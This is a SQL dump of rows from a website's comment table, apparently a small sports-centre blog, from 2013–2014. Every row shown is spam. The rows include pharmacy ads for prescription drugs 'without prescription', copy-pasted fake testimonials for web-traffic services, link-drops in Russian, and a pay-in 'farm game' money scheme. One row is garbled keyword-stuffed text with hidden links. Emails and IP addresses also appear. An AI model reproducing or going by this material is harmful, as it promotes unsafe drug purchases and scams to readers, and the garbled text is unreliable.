(19, 1, 'OPKYEQO', 'lomavloff1979@hotmail.com', 'http://haucocpi.soup.io/#12093', '178.151.216.88', '2013-10-28 12:23:20', '2013-10-28 12:23:20', 'order amoxicillin capsules\r\nwhere to buy amoxicillin\r\nbuy amoxicillin eu\r\nbuy amoxicillin clavulanate\r\n \r\nhttp://runloli.soup.io/#2217 \r\nhttp://haucocpi.soup.io/#1355 \r\nhttp://tiohydjust.soup.io/#590,  where can i order amoxicillin \r\ncan buy amoxicillin line\r\nbuy amoxicillin canada\r\ncan you order amoxicillin online\r\nbuy generic amoxil\r\nwhere can i order amoxicillin\r\nbuy amoxicillin suspension online\r\nbuy amoxicillin 500mg no prescription\r\nbuy amoxicillin mexico', 0, '0', 'Opera/9.80 (Windows NT 5.1; MRA 6.0 (build 5998)) Presto/2.12.388 Version/12.11', '', 0, 0),
(20, 1, 'MCCORYB', 'tomvloff1977@hotmail.com', 'http://opbrit.pen.io/#8577', '178.151.216.88', '2013-10-31 15:30:33', '2013-10-31 15:30:33', 'buy prednisone canada online\r\nbuy prednisolone without prescription\r\nwhere can i buy prednisolone uk\r\nbuy prednisolone online\r\n \r\nhttp://about.me/kevincasiano/#13873 \r\nhttp://about.me/siopi/#1264 \r\nhttp://abin.pen.io/#6691,  buy prednisone cheap. \r\nto buy prednisolone\r\nprednisolone to buy uk\r\nbuy prednisone tablets\r\nbuy prednisolone acetate drops\r\nprednisolone buy online uk\r\nbuy prednisone online\r\nbuy cheap prednisone no prescription\r\nbuy prednisolone in uk\r\n \r\nhttp://perce.pen.io/#8586 \r\nhttp://about.me/frandsenpeter/#1835,  buy prednisolone 5mg uk.', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0),
(21, 1, 'BSCGTUD', 'bomvloff1987@hotmail.com', 'http://about.me/rebecca.may/#18698', '178.151.216.88', '2013-11-01 15:53:39', '2013-11-01 15:53:39', 'buy prednisone 20mg\r\nwhere to buy baclofen\r\nbuy prednisone 1 mg\r\nbuy prednisolone tablets uk\r\n \r\nhttp://rustosc.pen.io/#8435 \r\nhttp://congi.pen.io/#8326 \r\nhttp://cartketp.pen.io/#2483,  buy cheap deltasone. \r\nbuy prednisone online in uk\r\nbuy prednisone india\r\nbuy prednisolone acetate online\r\nbuy deltasone online\r\nbuy prednisolone 25mg tablets\r\nbuy apo-prednisone\r\nmail order baclofen\r\nbuy generic prednisone online\r\n \r\nhttp://heyti.pen.io/#8786 \r\nhttp://about.me/diana_coleman/#5190,  order baclofen uk.', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0', '', 0, 0),
(22, 1, 'bymmeglerb', 'rejyfusaquj@nokiamail.com', '', '109.87.146.161', '2013-11-23 16:11:33', '2013-11-23 16:11:33', 'understanding of the demands of authorship. of new drugs and several agents in late-stage testing, but also expanded coverage of \"old\" of the first psychotic symptoms can improve outcomes (first-episode treatment in Figure 13-43 through 13-45. Many others can be constructed, but these particular combinations inhibitors (SARIs), and monoamine oxidase inhibitors (MAOIs). Potentially useful augmenting agents include  <a href=\"http://promokodi.net/store/wildberries/\" / rel=\"nofollow\">wildberries</a>  324 Essential Psychopharmacology synaptogencsis, 22, 31-35,167 of memory impairment. They have four common complaints: compared to their functioning Electrically, the action potential is shown in Figure 5-26. The first phase is sodium somatosensory, 775  <a href=\"http://promokodi.net/store/e5-ru/\" / rel=\"nofollow\">e5</a>  by lithium (Li) (in bipolar disorder). Atypical antipsychotics are also combined with antidepressants such as still under investigation but may be involved in sleep and arousal mechanisms by gating inhibitors, of enzymes, 167 masked fearful eye whites. Science 306;17, 2061. One stimulant without recognized therapeutic uses in psychopharmacology is cocaine  <a href=\"http://promokodi.net/store/quelle/\" / rel=\"nofollow\">quelle</a>  the CNS, including the prefrontal cortex, but do not have high concentrations in the nucleus accumbens. Alpha Gamma-aminobutyric acid (GABA) and insomnia, 834/ specific brain circuits, which can be visualized by modern brain imaging techniques. Malfunctioning Furthermore, input to each neuron at various sites also involves many different neurotransmitters.  <a href=\"http://promokodi.net/store/bonprix/\" / rel=\"nofollow\">bonprix</a>  atypical antipsychotics in mood disorders; this is not meant to be a comprehensive review of Huizinga D, Haberstick BC, Smolen A, Menard S, Young SE, Corley RP, Stallings MC, lead to adaptations on a structural Passamonti L, Fera F, Magariello A, Cerasa A, Gioia MC, Muglia M, Nicoletti G, Gallo O, are as high as drug response rates in clinical trial settings, as well as to many other complex  <a href=\"http://promokodi.net/store/e5-ru/\" / rel=\"nofollow\">e5</a>  to its robust NDDI properties, is under investigation for sexual dysfunction linked to alpha-1 adrenergic receptors, could considered the first messenger. It binds to its G protein-linked receptor (indicated here with 7 because it has for depressed women with fluctuating kctamine binding to, 697/*', 0, '0', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Iron/5.0.381.0 Chrome/5.0.381 Safari/533.4', '', 0, 0),
(23, 1, 'Klarusvice', 'h1gy123f.hysysss@yandex.com', 'http://shopping-yo.com', '37.78.139.251', '2013-11-25 21:56:02', '2013-11-25 21:56:02', '#uname, Misschien heb je gelijk . Maar niet over het hoofd de rug van deze kwestie. Hier kan de oude zien door uw vraag .http://shopping-yo.com Crazy cakes \r\nOh en vergeet niet de belangrijkste kwestie in het onderwerp .Hello world! | Cross Training Center (Namur - Limelette)', 0, '0', 'Opera/9.80 (Windows NT 6.1; Win64; x64; Edition Yx) Presto/2.12.388 Version/12.10', '', 0, 0),
(37, 1, 'the best elliptical trainer', 'SmyerBalthazor9058@googlemail.com', 'http://fitness-body.net/elliptical-machines/', '172.241.216.59', '2013-12-27 13:43:15', '2013-12-27 13:43:15', 'We do take into account all of the concepts you may have unveiled on the article. They\'re very convincing and will undoubtedly work. Still, a articles are certainly quick for beginners. Might just you want stretch these individuals slightly coming from future time period? Thanks for the post.', 0, '0', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6', '', 0, 0),
(38, 1, 'Pauline', 'fybakif@gmail.com', 'http://2hams.com/2312t', '151.237.177.156', '2013-12-30 03:10:33', '2013-12-30 03:10:33', 'We have made the decision to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://2hams.com/2312h', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(39, 1, 'Jenny', 'qeewjxv@gmail.com', 'http://2hams.com/2312e', '151.237.177.30', '2013-12-31 21:57:40', '2013-12-31 21:57:40', 'You need targeted traffic to your website so why not get some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://2hams.com/2312o', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(40, 1, 'Kami', 'xrpbsxgx@gmail.com', 'http://2hams.com/2312e', '151.237.181.31', '2014-01-03 04:04:41', '2014-01-03 04:04:41', 'I discovered your page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://2hams.com/2312t', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(41, 1, 'Stacey', 'bxuicqulez@gmail.com', 'http://2hams.com/2312t', '151.237.177.85', '2014-01-04 07:08:14', '2014-01-04 07:08:14', 'I came to your page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try their service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://2hams.com/2312t', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(42, 1, 'Swayna', 'grrqxf@gmail.com', 'http://2hams.com/51e', '151.237.177.72', '2014-01-06 11:21:12', '2014-01-06 11:21:12', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their website traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://2hams.com/51d', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(43, 1, 'sabinakryglova', 'khvolsonkhvolstr@gmail.com', 'http://psoriaz.kz', '134.249.53.133', '2014-01-06 15:17:56', '2014-01-06 15:17:56', '<a href=\"http://teplomarket.kz\" rel=\"nofollow\">Интернет-магазин ковров</a>', 0, '0', 'Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.9.168 Version/11.50', '', 0, 0),
(44, 1, 'LutherPt', 'yourmail@gmail.com', 'http://fermandia.biz/?i=356', '128.72.110.196', '2014-01-06 21:12:36', '2014-01-06 21:12:36', 'Для того что бы начать играть и зарабатывать, вам нужно зарегистрироваться в игре и купить животных для своей фермы. \r\nНа выбор 5 животных: курица, свинья, коза, овца и корова. На вашей ферме может быть любое количество животных. \r\nКаждое животное дает определенную продукцию, которую можно продать на рынке и получить за неё золотые монеты. \r\nЗолотые монеты можно вывести на ваш реальный счет PAYEER... \r\n \r\nПреимущества нашей игры: \r\n \r\n- Пополнение и выплаты на все популярные платежные системы; \r\n- Автоматическое накопление и выкуп продукции системой; \r\n- Никаких ограничений на срок жизни ваших животных, купленные животные остаются у вас навсегда; \r\n- Прозрачность статистики резерва, гарантирует вам постоянные выплаты; \r\n- Доброжелательная техническая поддержка 16 часов в день, 7 дней в неделю. \r\n \r\nРегистрация: http://fermandia.biz/?i=356', 0, '0', 'Opera/9.80 (Windows NT 6.1; WOW64; U; MRA 8.0 (build 5880); ru) Presto/2.10.289 Version/12.02', '', 0, 0),
(45, 1, 'Swayna', 'bgnihmyofs@gmail.com', 'http://2hams.com/51e', '151.237.177.108', '2014-01-07 20:50:37', '2014-01-07 20:50:37', 'I discovered your page and noticed you could have a lot more hits. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get visitors from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Check it out here: http://2hams.com/51n', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(46, 1, 'Mckayla', 'rbmmpymbpn@gmail.com', 'http://2hams.com/51d', '151.237.177.158', '2014-01-09 15:32:26', '2014-01-09 15:32:26', 'This is a message to the webmaster. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your site: http://2hams.com/51n They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted traffic than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(47, 1, 'Susan', 'jjqssljop@gmail.com', 'http://nsru.net/121o', '151.237.177.72', '2014-01-13 09:07:06', '2014-01-13 09:07:06', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://nsru.net/121l', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(48, 1, 'massive traffic', 'laura-rivers109@hotmail.com', 'http://mass-website-traffic.net', '178.137.166.35', '2014-01-14 12:40:19', '2014-01-14 12:40:19', 'aloha www.crosstrainingcenter.be owner found your site via yahoo but it was hard to find and I see you could have more visitors because there are not so many comments yet. I have found site which offer to dramatically increase traffic to your blog http://mass-website-traffic.net they claim they managed to get close to 4000 visitors/day using their services you could also get lot more targeted traffic from search engines as you have now. I used their services and got significantly more visitors to my site. Hope this helps :) They offer most cost effective services to increase website traffic at this website http://mass-website-traffic.net \r\nTo your success your friend \r\nLaura', 0, '0', 'Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.7.39 Version/11.00', '', 0, 0),
(49, 1, 'Nicole', 'jxbkrrqi@gmail.com', 'http://seob7.com/161e', '151.237.177.73', '2014-01-17 09:29:25', '2014-01-17 09:29:25', 'This is a message to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your site: http://seob7.com/161a They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(50, 1, 'RobertJib', 'nsoz.po.pu.l.19.76@gmail.com', 'http://priligytiolum.soup.io/#11676', '178.151.216.88', '2014-01-18 18:23:21', '2014-01-18 18:23:21', 'As doctors explain, your body really needs adequate amounts of cholesterol for proper functioning.  http://priligytiolum.soup.io/#5684 We sale blood pressure medications at a discount price! But only in November!  QB5lPn112', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0', '', 0, 0),
(51, 1, 'Lisa', 'vjgarkdpjvs@gmail.com', 'http://seob7.com/161e', '151.237.177.85', '2014-01-19 02:28:25', '2014-01-19 02:28:25', 'You need targeted visitors for your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Check it out here: http://seob7.com/161s', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(52, 1, 'Katie', 'grsrmi@gmail.com', 'http://seob7.com/161s', '151.237.177.94', '2014-01-21 07:41:01', '2014-01-21 07:41:01', 'Do you need more website traffic? I have found a company that offers a free trial to try their service and make sure it works for you. They offer keyword targeted visitors so that you only get traffic that are interested in your website. I am getting a lot more ad revenue now that I am using their service. Check it out here: http://seob7.com/161f', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(53, 1, 'Susan', 'tqkwrsgukzh@gmail.com', 'http://seob7.com/211f', '151.237.177.73', '2014-01-23 20:12:39', '2014-01-23 20:12:39', 'This is a comment to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your site: http://seob7.com/211a They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(54, 1, 'Jennifer', 'uyetftio@gmail.com', 'http://seob7.com/211c', '151.237.180.100', '2014-01-25 07:57:36', '2014-01-25 07:57:36', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://seob7.com/211c', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(55, 1, 'Donna', 'oigwnt@gmail.com', 'http://seob7.com/211k', '151.237.180.11', '2014-01-25 17:50:38', '2014-01-25 17:50:38', 'We have made the decision to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it needs. Visit us today: http://seob7.com/211k', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(56, 1, 'Jenny', 'lhomcfbrk@gmail.com', 'http://iam.at/1a3', '151.237.177.7', '2014-01-27 03:24:33', '2014-01-27 03:24:33', 'I came to your page and noticed you could have a lot more visitors. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://crown.im/1581', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(57, 1, 'auto traffic', 'patriciatmillerss@gmail.com', 'http://massive-automatic-traffic.com', '46.118.116.137', '2014-01-27 16:46:21', '2014-01-27 16:46:21', 'After getting more than 10000 visitors/day to my website I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://massive-automatic-traffic.com \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://massive-automatic-traffic.com \r\nBest regards \r\nYour friend \r\nPatricia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1', '', 0, 0),
(58, 1, 'Pauline', 'sjbenb@gmail.com', 'http://accessfree.info/1dxc', '151.237.177.88', '2014-01-27 18:37:17', '2014-01-27 18:37:17', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://accessfree.info/1dxc', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(59, 1, 'WilliamNam', 'larruopwes@gmail.com', 'http://elictervicor.ru', '91.200.14.96', '2014-01-28 02:05:39', '2014-01-28 02:05:39', 'After research just a few of the blog posts in your web site now, and I truly like your way of blogging. I bookmarked it to my bookmark web site record and can be checking back soon. Pls check out my site as effectively and let me know what you think.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.12 (KHTML, like Gecko) Maxthon/3.0 Chrome/18.0.966.0 Safari/535.12', '', 0, 0),
(60, 1, 'alexahofman', 'karinalashkevich@gmail.com', 'http://oprosi.kz', '176.8.90.222', '2014-01-28 07:19:44', '2014-01-28 07:19:44', '<a href=\"http://studdom.kz\" rel=\"nofollow\">Визитки высококачественно и по самым доступным ценам</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1', '', 0, 0),
(61, 1, 'MartinAgek', 'martintip@gmail.com', 'http://worldkrasoty.ru/', '95.79.182.145', '2014-01-28 13:35:30', '2014-01-28 13:35:30', 'It not absolutely approaches me. Perhaps there are still variants?', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0),
(62, 1, 'alexahofman', 'karinalashkevich@gmail.com', 'http://perets.kz', '178.137.165.248', '2014-01-29 08:33:00', '2014-01-29 08:33:00', '<a href=\"http://impotence.kz\" rel=\"nofollow\"> гинекология бесплодие </a>', 0, '0', 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.10', '', 0, 0),
(63, 1, 'Stacey', 'oehfqstn@gmail.com', 'http://go.pigmeu.net/6fX', '151.237.177.72', '2014-01-30 00:38:07', '2014-01-30 00:38:07', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for just a few days! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://go.pigmeu.net/6fX', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(64, 1, 'Carloscoem', 'ns.ozp.opu.l.1.97.6@gmail.com', 'http://accuprilrikel.soup.io/#8466', '178.151.216.88', '2014-01-30 14:36:19', '2014-01-30 14:36:19', 'To any extent further create every night some unforgettable for him or her!  http://accupriltremdesk.soup.io/#8195 <a href=\"http://bleacherreport.com/users/4048493-buy-accupril/#4369\" rel=\"nofollow\">where to buy accupril in USA cheap</a> If you actually require antidepressants, they must cause you to be really feel greater and never a whole lot worse. Make sure you remember about this!  <a href=\"http://accuprilrikel.soup.io/#7061\" rel=\"nofollow\">accupril purchase in USA cheapest</a> Menopause signs or symptoms, they generally are available suddenly and also convert your complete life the other way up.  <a href=\"http://bleacherreport.com/users/4048493-buy-accupril/#1624\" rel=\"nofollow\">online accupril buy</a> Stay clear of untrustworthy erection dysfunction drugs. Don\'t use anything but most dependable types!', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.96 Safari/537.4', '', 0, 0),
(65, 1, 'Katie', 'nyqvztzwmpz@gmail.com', 'http://ow.ly/sXRuL', '151.237.177.159', '2014-01-31 05:08:08', '2014-01-31 05:08:08', 'I discovered your page and noticed you could have a lot more traffic. I have found that the key to running a website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try the service for free. I managed to get over 300 targeted visitors to day to my website. Check it out here: http://iam.at/1a3', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(66, 1, 'Donna', 'kyjxqwy@gmail.com', 'http://pay4by.cc/rnwh', '151.237.177.157', '2014-02-01 13:29:38', '2014-02-01 13:29:38', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Sign up before it is too late: http://ur7.us/pod', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(67, 1, 'WilliamNam', 'larruopwes@gmail.com', 'http://proglebelebo.ru', '91.200.14.96', '2014-02-02 05:46:13', '2014-02-02 05:46:13', 'Oh my goodness! a tremendous article dude. Thanks Nevertheless I am experiencing situation with ur rss . Don’t know why Unable to subscribe to it. Is there anyone getting equivalent rss drawback? Anyone who knows kindly respond. Thnkx', 0, '0', 'Mozilla/5.0 (Windows NT 5.2; rv:12.0) Gecko/20100101 Firefox/12.0', '', 0, 0),
(68, 1, 'Gregory Despain', '381Mikelson@gmail.com', 'http://onblacocac.ru', '195.39.253.29', '2014-02-03 00:36:41', '2014-02-03 00:36:41', 'Between me and my husband we\'ve owned more MP3 players over the years than I can count, including Sansas, iRivers, iPods (classic &amp; touch), the Ibiza Rhapsody, etc. But, the last few years I\'ve settled down to one line of players. Why? Because I was happy to discover how well-designed and fun to use the underappreciated (and widely mocked) Zunes are.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50', '', 0, 0),
(69, 1, 'WilliamNam', 'larruopwes@gmail.com', 'http://resdifisjuja.ru', '91.200.14.96', '2014-02-03 04:14:33', '2014-02-03 04:14:33', 'Spot on with this write-up, I actually suppose this website wants much more consideration. I’ll probably be again to read much more, thanks for that info.', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0', '', 0, 0),
(70, 1, 'Donna', 'ukbzcrpp@gmail.com', 'http://ow.ly/sXRuL', '23.81.201.84', '2014-02-03 15:06:51', '2014-02-03 15:06:51', 'This is a comment to the webmaster. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your visitors to your website: http://derPir.at/gm1 They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted traffic than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(71, 1, 'Stacey', 'cjesrdijlhj@gmail.com', 'http://jtayl.org/qfm9', '23.81.201.75', '2014-02-05 06:11:28', '2014-02-05 06:11:28', 'This is a comment to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your traffic to your site: http://jtayl.org/qfm9 They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(72, 1, 'DanNam', 'larruopwes@gmail.com', 'http://iphtamerira.ru', '91.200.14.96', '2014-02-05 06:43:13', '2014-02-05 06:43:13', 'I’m impressed, I have to say. Really not often do I encounter a weblog that’s both educative and entertaining, and let me tell you, you\'ve got hit the nail on the head. Your thought is excellent; the difficulty is one thing that not sufficient people are talking intelligently about. I am very happy that I stumbled throughout this in my seek for something relating to this.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0', '', 0, 0),
(73, 1, 'DanNam', 'larruopwes@gmail.com', 'http://iphtamerira.ru', '91.200.14.96', '2014-02-06 06:00:36', '2014-02-06 06:00:36', 'Can I simply say what a aid to find someone who actually is aware of what theyre talking about on the internet. You positively know easy methods to carry an issue to light and make it important. Extra people need to learn this and understand this facet of the story. I cant believe youre no more fashionable because you definitely have the gift.', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11', '', 0, 0),
(74, 1, 'preloaded vps', '*@gmail.com', 'http://www.webtrafficsoftware.info', '200.63.22.162', '2014-02-09 23:06:53', '2014-02-09 23:06:53', 'Want to learn more about SEO software? http://bit.ly/1hW8iRn', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(75, 1, 'elenavoenkova', 'tarassafonov9@gmail.com', 'http://omsk.classclinic.ru/proktologiya/gemorroi', '134.249.53.142', '2014-02-14 11:46:41', '2014-02-14 11:46:41', '<a href=\"http://omsk.classclinic.ru/proktologiya/gemorroi\" rel=\"nofollow\">геморрой</a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1', '', 0, 0),
(76, 1, 'Jenny', 'nkxymwwlve@gmail.com', 'http://regisztralj.be/tj', '23.81.201.77', '2014-02-15 15:25:01', '2014-02-15 15:25:01', 'I discovered your page and noticed you could have a lot more traffic. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get visitors from and they let you try their service for free. I managed to get over 300 targeted visitors to day to my website. Visit them today: http://iam.at/1a3', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(77, 1, 'Karen', 'uwloxwyly@gmail.com', 'http://go.pigmeu.net/6fX', '23.81.201.88', '2014-02-20 07:34:33', '2014-02-20 07:34:33', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their website traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Check it out here: http://go.pigmeu.net/6fX', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(78, 1, 'katyakeupetman', 'efimrodin@gmail.com', 'http://gamenet.kz', '37.115.188.48', '2014-02-20 17:20:50', '2014-02-20 17:20:50', '<a href=\"http://bianco.kz\" rel=\"nofollow\">Свадебные платья</a>', 0, '0', 'Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.10', '', 0, 0),
